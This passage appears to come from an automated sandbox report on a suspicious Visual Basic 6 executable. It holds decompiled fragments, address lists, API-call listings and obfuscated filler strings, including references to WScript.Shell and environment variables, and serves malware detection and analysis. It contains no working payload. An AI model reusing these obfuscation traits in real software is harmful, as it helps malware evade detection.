																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x1eadd5f2
0x1eadd5f5
0x1eadd5f5
0x1eadd5fd
0x1eadd600
0x1eadd60a
0x1eadd60d
0x1eadd617
0x1eadd61d
0x1eadd627
0x1eadd62e
0x1eadd911
0x1eadd913
0x00000000
0x1eadd919
0x1eadd919
0x1eadd919
0x1eadd634
0x1eadd634
0x1eadd634
0x1eadd634
0x1eadd640
0x1eadd8bf
0x00000000
0x1eadd646
0x1eadd646
0x1eadd64d
0x1eadd652
0x1eb2b2fc
0x1eb2b2fc
0x1eb2b302
0x1eb2b33b
0x1eb2b341
0x00000000
0x1eb2b304
0x1eb2b304
0x1eb2b319
0x1eb2b31e
0x1eb2b324
0x1eb2b326
0x1eb2b332
0x1eb2b347
0x1eb2b34c
0x1eb2b351
0x1eb2b35a
0x00000000
0x1eb2b328
0x1eb2b328
0x00000000
0x1eb2b328
0x1eb2b326
0x1eadd658
0x1eadd658
0x1eadd65b
0x1eadd665
0x00000000
0x1eadd66b
0x1eadd66b
0x1eadd66b
0x1eadd66b
0x1eadd66d
0x1eadd672
0x1eadd67a
0x00000000
0x00000000
0x1eadd680
0x1eadd686
0x1eadd8ce
0x1eadd8d4
0x1eadd8dd
0x1eadd8e0
0x1eadd68c
0x1eadd691
0x1eadd69d
0x1eadd6a2
0x1eadd6a7
0x1eadd6b0
0x1eadd6b5
0x1eadd6e0
0x1eadd6b7
0x1eadd6b7
0x1eadd6b9
0x1eadd6b9
0x1eadd6bb
0x1eadd6bd
0x1eadd6ce
0x1eadd6d0
0x1eadd6d2
0x1eb2b363
0x1eb2b365
0x00000000
0x1eb2b36b
0x00000000
0x1eb2b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1eadd6bf
0x1eadd6bf
0x1eadd6e5
0x1eadd6e7
0x1eadd6e9
0x1eadd6ec
0x1eadd6ec
0x1eadd6ef
0x1eadd6f5
0x1eadd6f9
0x1eadd6fb
0x1eadd6fd
0x1eadd701
0x1eadd703
0x1eadd70a
0x1eadd70a
0x1eadd701
0x1eadd710
0x1eadd710
0x1eadd6c1
0x1eadd6c1
0x1eadd6c6
0x1eb2b36d
0x1eb2b36f
0x00000000
0x1eb2b375
0x1eb2b375
0x1eb2b375
0x00000000
0x1eb2b375
0x00000000
0x1eadd6cc
0x1eadd6d8
0x1eadd6d8
0x1eadd6d8
0x00000000
0x1eadd6c6
0x1eadd6bf
0x00000000
0x1eadd6da
0x1eadd6da
0x1eadd716
0x1eadd71b
0x1eadd720
0x1eadd726
0x1eadd726
0x1eadd72d
0x00000000
0x1eadd733
0x1eadd739
0x1eadd742
0x1eadd750
0x1eadd758
0x1eadd764
0x1eadd776
0x1eadd77a
0x1eadd783
0x1eadd928
0x1eadd92c
0x1eadd93d
0x1eadd944
0x1eadd94f
0x1eadd954
0x1eadd956
0x1eadd95f
0x1eadd961
0x1eadd973
0x1eadd973
0x1eadd956
0x1eadd944
0x1eadd92c
0x1eadd78b
0x1eb2b394
0x1eadd791
0x1eadd798
0x1eb2b3a3
0x1eb2b3bb
0x1eb2b3bb
0x1eadd7a5
0x1eadd866
0x1eadd870
0x1eadd884
0x1eadd892
0x1eadd898
0x1eadd89e
0x1eadd8a0
0x1eadd8a6
0x1eadd8ac
0x1eadd8ae
0x1eadd8b4
0x1eadd8b4
0x1eadd8ae
0x1eadd7a5
0x1eadd78b
0x1eadd7b1
0x1eb2b3c5
0x1eb2b3c5
0x1eadd7c3
0x1eadd7ca
0x1eadd7e5
0x1eadd7eb
0x1eadd8eb
0x1eadd8ed
0x00000000
0x1eadd8f3
0x1eadd8f3
0x1eadd8f3
0x00000000
0x1eadd8ed
0x1eadd7cc
0x1eadd7cc
0x1eadd7d2
0x00000000
0x1eadd7d4
0x1eadd7d4
0x1eadd7d7
0x1eadd7df
0x1eb2b3d4
0x1eb2b3d9
0x1eb2b3dc
0x1eb2b3dc
0x1eb2b3df
0x1eb2b3e2
0x1eb2b468
0x1eb2b46d
0x1eb2b46f
0x1eb2b46f
0x1eb2b475
0x1eadd8f8
0x1eadd8f9
0x1eadd8fd
0x1eb2b3e8
0x1eb2b3e8
0x1eb2b3eb
0x1eb2b3ed
0x00000000
0x1eb2b3ef
0x1eb2b3ef
0x1eb2b3f1
0x1eb2b3f4
0x1eb2b3fe
0x1eb2b404
0x1eb2b409
0x1eb2b40e
0x1eb2b410
0x1eb2b410
0x1eb2b414
0x1eb2b414
0x1eb2b41b
0x1eb2b420
0x1eb2b423
0x1eb2b425
0x1eb2b427
0x1eb2b42a
0x1eb2b42d
0x1eb2b42d
0x1eb2b42a
0x1eb2b432
0x1eb2b436
0x1eb2b438
0x1eb2b43b
0x1eb2b43b
0x1eb2b449
0x1eb2b44e
0x1eb2b454
0x1eb2b458
0x1eb2b458
0x1eb2b45d
0x00000000
0x1eb2b45d
0x1eb2b3ed
0x00000000
0x00000000
0x00000000
0x1eadd7df
0x1eadd7d2
0x1eadd7ca
0x1eb2b37c
0x1eb2b37e
0x1eb2b385
0x1eb2b38a
0x00000000
0x1eb2b38a
0x1eadd742
0x1eadd7f1
0x1eadd7f8
0x1eb2b49b
0x1eb2b49b
0x1eadd800
0x1eadd837
0x1eadd843
0x1eadd845
0x1eadd847
0x1eadd84a
0x1eadd84b
0x1eadd84e
0x1eadd857
0x1eadd802
0x1eadd802
0x1eadd80d
0x00000000
0x1eadd818
0x1eadd818
0x1eadd824
0x1eadd831
0x1eb2b4a5
0x1eb2b4ab
0x1eb2b4b3
0x1eb2b4b8
0x1eb2b4bb
0x00000000
0x1eb2b4c1
0x1eb2b4c1
0x1eb2b4c8
0x00000000
0x1eb2b4ce
0x1eb2b4d4
0x1eb2b4e1
0x1eb2b4e3
0x1eb2b4e5
0x00000000
0x1eb2b4eb
0x1eb2b4f0
0x1eb2b4f2
0x1eaddac9
0x1eaddacc
0x1eaddacf
0x1eaddad1
0x1eaddd78
0x1eaddd78
0x1eaddcf2
0x00000000
0x1eaddad7
0x1eaddad9
0x1eaddadb
0x00000000
0x00000000
0x1eaddae1
0x1eaddae1
0x1eaddae4
0x1eaddae6
0x1eb2b4f9
0x1eb2b4f9
0x1eb2b500
0x1eaddaec
0x1eaddaec
0x1eaddaf5
0x1eaddaf8
0x1eaddafb
0x1eaddb03
0x1eaddb11
0x1eaddb16
0x1eaddb19
0x1eaddb1b
0x1eb2b52c
0x1eb2b531
0x1eb2b534
0x1eaddb21
0x1eaddb21
0x1eaddb24
0x1eaddcd9
0x1eaddce2
0x1eaddce5
0x1eaddd6a
0x1eaddd6d
0x00000000
0x1eaddd73
0x1eb2b51a
0x1eb2b51c
0x1eb2b51f
0x1eb2b524
0x00000000
0x1eb2b524
0x1eaddce7
0x1eaddce7
0x1eaddce7
0x00000000
0x1eaddce7
0x00000000
0x1eaddb2a
0x1eaddb2c
0x1eaddb31
0x1eaddb33
0x1eaddb36
0x1eaddb39
0x1eaddb3b
0x1eaddb66
0x1eaddb66
0x1eaddb3d
0x1eaddb3d
0x1eaddb3e
0x1eaddb46
0x1eaddb47
0x1eaddb49
0x1eaddb4c
0x1eaddb53
0x1eaddb55
0x1eaddb58
0x1eaddb5a
0x1eb2b50a
0x1eb2b50f
0x1eb2b512
0x1eaddb60
0x1eaddb60
0x1eaddb63
0x1eaddb63
0x00000000
0x1eaddb63
0x1eaddb5a
0x1eaddb3b
0x1eaddb24
0x1eaddb69
0x1eaddb69
0x1eaddb6c
0x1eaddb6f
0x1eaddb74
0x1eb2b557
0x1eb2b557
0x1eb2b55e
0x1eaddb7a
0x1eaddb7c
0x1eaddb7f
0x1eaddb82
0x1eaddb85
0x00000000
0x1eaddb8b
0x1eaddb8b
0x1eaddb8d
0x1eaddb9b
0x1eaddb9b
0x1eaddb9d
0x1eaddba0
0x1eaddba2
0x1eaddba4
0x1eaddba7
0x1eaddba9
0x1eaddbae
0x1eaddbae
0x1eaddbb1
0x1eaddbb4
0x1eaddbb4
0x1eaddbb7
0x1eaddbba
0x1eaddcd2
0x1eaddcd4
0x00000000
0x1eaddbc0
0x1eaddbc0
0x1eaddbd2
0x1eaddbd7
0x1eaddbda
0x1eaddbdd
0x1eaddbdf
0x00000000
0x1eaddbe5
0x1eaddbe5
0x1eaddbee
0x1eaddbf1
0x1eb2b541
0x1eb2b544
0x00000000
0x1eb2b546
0x1eb2b546
0x00000000
0x1eb2b546
0x1eaddbf7
0x1eaddbf7
0x1eaddbfd
0x1eaddbfd
0x1eaddbff
0x1eaddc0b
0x1eaddc15
0x1eaddc1b
0x1eaddc1d
0x1eaddc21
0x1eaddc21
0x1eaddc23
0x1eaddc23
0x1eaddc26
0x1eaddc29
0x1eaddc2b
0x00000000
0x00000000
0x1eaddc31
0x1eaddc34
0x1eaddc36
0x1eaddcbf
0x1eaddcbf
0x1eaddcc2
0x00000000
0x1eaddc3c
0x1eaddc41
0x1eaddc43
0x00000000
0x1eaddc45
0x1eaddc45
0x1eaddc47
0x00000000
0x1eaddc4d
0x1eaddc4d
0x1eaddc50
0x1eaddc52
0x1eaddc55
0x1eaddcfa
0x1eaddcfe
0x1eaddd08
0x1eaddd0a
0x1eaddd0c
0x00000000
0x1eaddd12
0x1eaddd15
0x1eaddd2d
0x1eaddd2f
0x1eaddd32
0x1eaddd35
0x00000000
0x1eaddd35
0x1eaddc5b
0x1eaddc5b
0x1eaddc5e
0x1eaddc61
0x1eaddc64
0x1eaddc67
0x1eaddc67
0x1eaddc6a
0x1eaddc6c
0x1eaddc8e
0x1eaddc8e
0x1eaddc91
0x1eaddc93
0x1eaddcce
0x1eaddcce
0x1eaddc95
0x1eaddc9c
0x1eaddc6e
0x1eaddc72
0x1eaddc75
0x1eaddc77
0x1eaddc79
0x1eb2b551
0x1eb2b551
0x00000000
0x1eaddc7f
0x1eaddc7f
0x1eaddc81
0x00000000
0x1eaddc83
0x1eaddc86
0x1eaddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x1eaddc88
0x1eaddc81
0x1eaddc79
0x1eaddc6c
0x1eaddc55
0x1eaddc47
0x1eaddc43
0x00000000
0x1eaddc36
0x1eaddc23
0x00000000
0x1eaddbff
0x1eaddbf1
0x1eaddbdf
0x1eaddb8f
0x1eaddb92
0x1eaddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x1eaddb95
0x1eaddb8d
0x1eaddb85
0x1eaddb74
0x1eaddc9f
0x1eaddca2
0x1eaddcb0
0x1eaddcb0
0x1eaddad1
0x1eb2b4e5
0x1eb2b4c8
0x00000000
0x00000000
0x00000000
0x1eadd831
0x1eadd80d
0x00000000
0x1eadd800
0x1eb2b47f
0x1eb2b485
0x00000000
0x1eb2b485
0x1eadd665
0x1eadd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1EADD898

Strings

H+i, xrefs: 1EADD8CE
80i, xrefs: 1EADD69D

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 80i$H+i
API String ID: 3446177414-2239751774
Opcode ID: 4e7158c420417228263a646a4c9ff34dd835f17dbf3a5fdd73f2d57c5c878219
Instruction ID: 4375739909c2277d3c0922dafd0fb502a49b104c47f3971c59b94cc75f885f8c
Opcode Fuzzy Hash: 4e7158c420417228263a646a4c9ff34dd835f17dbf3a5fdd73f2d57c5c878219
Instruction Fuzzy Hash: 1CE1B434A00396CFDB24CF25C990BA9BBB2BF45314F1543E9D9099B290DB34AD89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00415920, Relevance: 103.6, APIs: 48, Strings: 11, Instructions: 322COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00415984
#582.MSVBVM60(36680000,4202A278), ref: 00415990
__vbaFpR8.MSVBVM60 ref: 00415996
__vbaStrCopy.MSVBVM60 ref: 004159B9
#712.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159CD
__vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159DE
__vbaStrCopy.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E4
__vbaFreeStr.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E9
#512.MSVBVM60(NAVIGATIONSSKOLERNES,00000081,?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159F9
__vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 00415A04
__vbaVarDup.MSVBVM60 ref: 00415A22
#558.MSVBVM60(?), ref: 00415A2C
__vbaFreeVar.MSVBVM60 ref: 00415A49
#716.MSVBVM60(?,WScript.Shell,00000000), ref: 00415A5F
__vbaObjVar.MSVBVM60(?), ref: 00415A69
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00415A74
__vbaFreeVar.MSVBVM60 ref: 00415A7D
__vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001), ref: 00415ADB
__vbaVarLateMemCallLd.MSVBVM60(?,00000000), ref: 00415AE9
__vbaStrVarMove.MSVBVM60(00000000), ref: 00415AF3
__vbaStrMove.MSVBVM60 ref: 00415AFE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415B0A
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415B26
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415B4B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,0000013C), ref: 00415B9C
__vbaFreeObj.MSVBVM60 ref: 00415BA5
#610.MSVBVM60(?), ref: 00415BBB
__vbaStrVarVal.MSVBVM60(?,?), ref: 00415BC9
#540.MSVBVM60(?,00000000), ref: 00415BD4
_adj_fdiv_m64.MSVBVM60 ref: 00415BFD
_adj_fdiv_m64.MSVBVM60 ref: 00415C29
__vbaVarTstGe.MSVBVM60(?,?), ref: 00415C40
__vbaFreeStr.MSVBVM60(?,?), ref: 00415C4C
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00415C5C
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415C81
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415CA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 00415CD3
__vbaFreeObj.MSVBVM60 ref: 00415CED
#539.MSVBVM60(?,0000009D,000000BE,000000E5), ref: 00415D06
__vbaStrVarMove.MSVBVM60(?), ref: 00415D10
__vbaStrMove.MSVBVM60 ref: 00415D1B
__vbaStrCopy.MSVBVM60 ref: 00415D25
__vbaFreeStr.MSVBVM60 ref: 00415D2E
__vbaFreeVar.MSVBVM60 ref: 00415D37
__vbaFreeObj.MSVBVM60(00415D8A), ref: 00415D6E
__vbaFreeStr.MSVBVM60 ref: 00415D7D
__vbaFreeStr.MSVBVM60 ref: 00415D82
__vbaFreeStr.MSVBVM60 ref: 00415D87

Strings

WINDIR, xrefs: 00415AA0
ctf, xrefs: 00415B79
NAVIGATIONSSKOLERNES, xrefs: 004159F4
PRODUKTUDVIKLER, xrefs: 00415A14
Brasiliansk, xrefs: 004159B2
WScript.Shell, xrefs: 00415A56
Item, xrefs: 00415A98
Nonincreasing1, xrefs: 004159C7
Preludiet5, xrefs: 004159C2
Environment, xrefs: 00415ACB
PROCESS, xrefs: 00415ABB

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$CheckCopyHresult$CallLateListNew2_adj_fdiv_m64$#512#539#540#558#582#610#712#716Addref
String ID: Brasiliansk$Environment$Item$NAVIGATIONSSKOLERNES$Nonincreasing1$PROCESS$PRODUKTUDVIKLER$Preludiet5$WINDIR$WScript.Shell$ctf
API String ID: 4167868168-594783680
Opcode ID: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
Instruction ID: bdfed9ac7365b67e29146c59590f7b3a1cc87b8179bb4dd4a60cd4cce7d5f936
Opcode Fuzzy Hash: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
Instruction Fuzzy Hash: 43D12B75900209EBDB04DFA4DE89ADEBBB4FF48704F10816AF505B72A0DB746985CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415390, Relevance: 77.2, APIs: 37, Strings: 7, Instructions: 229COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 004153AE
#693.MSVBVM60(Digitalkamera,?,?,?,?,00401326), ref: 004153E1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401326), ref: 004153FA
#578.MSVBVM60(Bfferne,?,?,?,?,00401326), ref: 0041540C
#517.MSVBVM60(Scapularies,?,?,?,?,00401326), ref: 00415427
__vbaStrMove.MSVBVM60(?,?,?,?,00401326), ref: 00415432
#610.MSVBVM60(?,?,?,?,?,00401326), ref: 00415443
#662.MSVBVM60(?,00402C74,?,00000002,00000001,00000001), ref: 0041546C
#696.MSVBVM60(Formaliaernes9), ref: 00415477
__vbaVarTstGt.MSVBVM60(00008002,?), ref: 00415499
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004154B4
__vbaFPInt.MSVBVM60(?,?,?,00401326), ref: 004154D9
#702.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 004154F5
__vbaStrMove.MSVBVM60 ref: 00415500
__vbaStrCopy.MSVBVM60 ref: 00415511
__vbaFreeStr.MSVBVM60 ref: 0041551A
__vbaFreeVar.MSVBVM60 ref: 00415523
#608.MSVBVM60(00000004,00000052), ref: 00415536
__vbaStrVarMove.MSVBVM60(00000004), ref: 00415540
__vbaStrMove.MSVBVM60 ref: 0041554B
__vbaFreeVar.MSVBVM60 ref: 00415554
__vbaVarDup.MSVBVM60 ref: 0041557B
#544.MSVBVM60(?,?), ref: 00415589
__vbaVarTstGt.MSVBVM60(00008002,?), ref: 004155AE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004155C5
__vbaNew2.MSVBVM60(004029E8,0041746C,?,?,?,?,?,?,00401326), ref: 004155F7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D8,00000014), ref: 0041565D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000060), ref: 004156BA
__vbaStrCopy.MSVBVM60 ref: 004156DE
__vbaFreeStr.MSVBVM60 ref: 004156E7
__vbaFreeObj.MSVBVM60 ref: 004156F0
__vbaStrCat.MSVBVM60(Unregenerable1,?), ref: 0041570C
__vbaStrMove.MSVBVM60 ref: 00415717
__vbaStrCopy.MSVBVM60 ref: 00415728
__vbaFreeStr.MSVBVM60 ref: 00415731
__vbaFreeStr.MSVBVM60(0041578E), ref: 0041577E
__vbaFreeStr.MSVBVM60 ref: 00415787

Strings

16:16:16, xrefs: 00415561
Scapularies, xrefs: 00415422
Formaliaernes9, xrefs: 00415472
Digitalkamera, xrefs: 004153DC
Unregenerable1, xrefs: 00415707
ltA, xrefs: 00415613
Bfferne, xrefs: 00415407

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$Copy$CheckHresultList$#517#544#578#608#610#662#693#696#702ChkstkErrorNew2
String ID: 16:16:16$Bfferne$Digitalkamera$Formaliaernes9$Scapularies$Unregenerable1$ltA
API String ID: 2918757743-1695909465
Opcode ID: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
Instruction ID: 3806a95896f8153a6f56456eff5a9f23e8b0e5f2b5942c0e8807afdb81e572b9
Opcode Fuzzy Hash: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
Instruction Fuzzy Hash: ADB10974900219EFDB14DFA0DE48BDDBBB4BF48705F1081A9E50AB72A0DB745A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00415030, Relevance: 70.2, APIs: 36, Strings: 4, Instructions: 221COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041508E
__vbaVarDup.MSVBVM60 ref: 004150AD
#617.MSVBVM60(?,?,0000006C), ref: 004150BD
__vbaVarTstGt.MSVBVM60(?,?), ref: 004150D9
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004150F2
#611.MSVBVM60 ref: 004150FC
__vbaStrMove.MSVBVM60 ref: 0041510D
__vbaVarDup.MSVBVM60 ref: 00415123
#518.MSVBVM60(?,?), ref: 00415131
__vbaStrVarMove.MSVBVM60(?), ref: 0041513B
__vbaStrMove.MSVBVM60 ref: 00415146
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415152
#610.MSVBVM60(?), ref: 00415163
__vbaStrVarVal.MSVBVM60(?,?), ref: 00415171
#540.MSVBVM60(?,00000000), ref: 0041517C
_adj_fdiv_m64.MSVBVM60 ref: 004151A5
_adj_fdiv_m64.MSVBVM60(00000008,?), ref: 004151D6
__vbaVarTstGe.MSVBVM60(00000008,?), ref: 004151E8
__vbaFreeStr.MSVBVM60 ref: 004151F8
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415208
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 0041522C
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415251
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 0041527E
__vbaFreeObj.MSVBVM60 ref: 00415298
#539.MSVBVM60(?,000000D7,000000D9,000000F9), ref: 004152B1
__vbaStrVarMove.MSVBVM60(?), ref: 004152BB
__vbaStrMove.MSVBVM60 ref: 004152C6
__vbaFreeVar.MSVBVM60 ref: 004152CB
__vbaVarDup.MSVBVM60 ref: 004152E5
#645.MSVBVM60(?,00000000), ref: 004152F0
__vbaStrMove.MSVBVM60 ref: 004152FB
__vbaFreeVar.MSVBVM60 ref: 00415300
__vbaFreeStr.MSVBVM60(00415362), ref: 00415350
__vbaFreeStr.MSVBVM60 ref: 00415355
__vbaFreeStr.MSVBVM60 ref: 0041535A
__vbaFreeStr.MSVBVM60 ref: 0041535F

Strings

DELIKATESSER, xrefs: 0041509F
disinhabit, xrefs: 004152D7
Kielbasa4, xrefs: 00415115
Dorsally4, xrefs: 004150CB

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$List$CheckHresult_adj_fdiv_m64$#518#539#540#610#611#617#645CopyNew2
String ID: DELIKATESSER$Dorsally4$Kielbasa4$disinhabit
API String ID: 1529234513-2571534993
Opcode ID: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
Instruction ID: d0022da710132c39d04a457d4db14dc12b6dad0a9a363c05a2efa2b7a27b2b3c
Opcode Fuzzy Hash: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
Instruction Fuzzy Hash: 53912971D00229DBCB05DFE4DD88AEEBB78FB48704F10812AE506B72A0DB745949CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00415DB0, Relevance: 63.3, APIs: 31, Strings: 5, Instructions: 260COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 00415E4E
#667.MSVBVM60(?), ref: 00415E54
__vbaVarDup.MSVBVM60 ref: 00415E79
#666.MSVBVM60(?,?), ref: 00415E83
__vbaInStrVar.MSVBVM60(?,00000000,?,?,00000028), ref: 00415EAC
__vbaVarTstGe.MSVBVM60(00008002,00000000), ref: 00415EBA
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00415ED9
__vbaVarDup.MSVBVM60 ref: 00415F04
#619.MSVBVM60(?,?,000000A6), ref: 00415F13
__vbaStrVarMove.MSVBVM60(?), ref: 00415F1D
__vbaStrMove.MSVBVM60 ref: 00415F28
__vbaStrCopy.MSVBVM60 ref: 00415F39
__vbaFreeStr.MSVBVM60 ref: 00415F42
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415F52
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415F6E
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415F93
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,000000F0), ref: 00415FBD
__vbaStrMove.MSVBVM60 ref: 00415FD0
__vbaFreeObj.MSVBVM60 ref: 00415FD9
__vbaFreeStr.MSVBVM60(0041604C), ref: 00416045

Strings

windir, xrefs: 00415E69
$r, xrefs: 00415FFE
Haandstrgen5, xrefs: 00415EF4
(j, xrefs: 00416168
userprofile, xrefs: 00415E3E

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$CheckHresultList$#619#666#667CopyNew2
String ID: $r$(j$Haandstrgen5$userprofile$windir
API String ID: 877882336-2823200559
Opcode ID: f45f4e24723edc4068a1049ce70ab0f59df7876e7cf46888b94df6565a318252
Instruction ID: cad36525ac23c74db11152aae2b8d1b6b0405709c4632bd15e99b0f78d374049
Opcode Fuzzy Hash: f45f4e24723edc4068a1049ce70ab0f59df7876e7cf46888b94df6565a318252
Instruction Fuzzy Hash: BCB10771900219EFCB14DFA4DD89AEEBBB8FB48700F10816AF505B72A0DB745949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00414E10, Relevance: 56.1, APIs: 25, Strings: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,660E6C30,660E1929), ref: 00414E68
#709.MSVBVM60(Lionisables5,renummererer,000000FF,00000000), ref: 00414E7B
#525.MSVBVM60(00000090), ref: 00414E8B
__vbaStrMove.MSVBVM60 ref: 00414E9C
#512.MSVBVM60(SIKSAKKENDES,00000063), ref: 00414EA5
__vbaStrMove.MSVBVM60 ref: 00414EB0
#523.MSVBVM60(valkeler), ref: 00414EBF
__vbaStrMove.MSVBVM60 ref: 00414ECA
#629.MSVBVM60(?,?,000000B4,?), ref: 00414EFB
__vbaVarTstNe.MSVBVM60(?,?), ref: 00414F1D
__vbaFreeStr.MSVBVM60 ref: 00414F2E
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 00414F3E
__vbaVarDup.MSVBVM60 ref: 00414F60
#522.MSVBVM60(00000002,00000008), ref: 00414F6E
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414F78
__vbaStrMove.MSVBVM60 ref: 00414F83
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 00414F8F
#527.MSVBVM60(JURYLESS), ref: 00414F9D
__vbaStrMove.MSVBVM60 ref: 00414FA8
__vbaStrCopy.MSVBVM60 ref: 00414FB5
__vbaFreeStr.MSVBVM60 ref: 00414FBE
__vbaFreeStr.MSVBVM60(0041500E), ref: 00414FFC
__vbaFreeStr.MSVBVM60 ref: 00415001
__vbaFreeStr.MSVBVM60 ref: 00415006
__vbaFreeStr.MSVBVM60 ref: 0041500B

Strings

Unstaggered6, xrefs: 00414F52
valkeler, xrefs: 00414EBA
SIKSAKKENDES, xrefs: 00414EA0
Lionisables5, xrefs: 00414E76
JURYLESS, xrefs: 00414F98
PHONOCARDIOGRAMME, xrefs: 00414F0C
renummererer, xrefs: 00414E71

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$CopyList$#512#522#523#525#527#629#709
String ID: JURYLESS$Lionisables5$PHONOCARDIOGRAMME$SIKSAKKENDES$Unstaggered6$renummererer$valkeler
API String ID: 3254860574-4034370320
Opcode ID: 9a4bab6e89ed57f8dc014a9e9b5e42676cfd5e510e7dcdda485c2f2765933c94
Instruction ID: 3ab4bd34e4038f1b6151edb9d35dad6ec0f5961beff2406b33e8d1207b77bc06
Opcode Fuzzy Hash: 9a4bab6e89ed57f8dc014a9e9b5e42676cfd5e510e7dcdda485c2f2765933c94
Instruction Fuzzy Hash: A651E875D002499BDB04DFD4DD89ADEBFB8BF58300F10412AE506B72A4DBB41689CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040469E, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

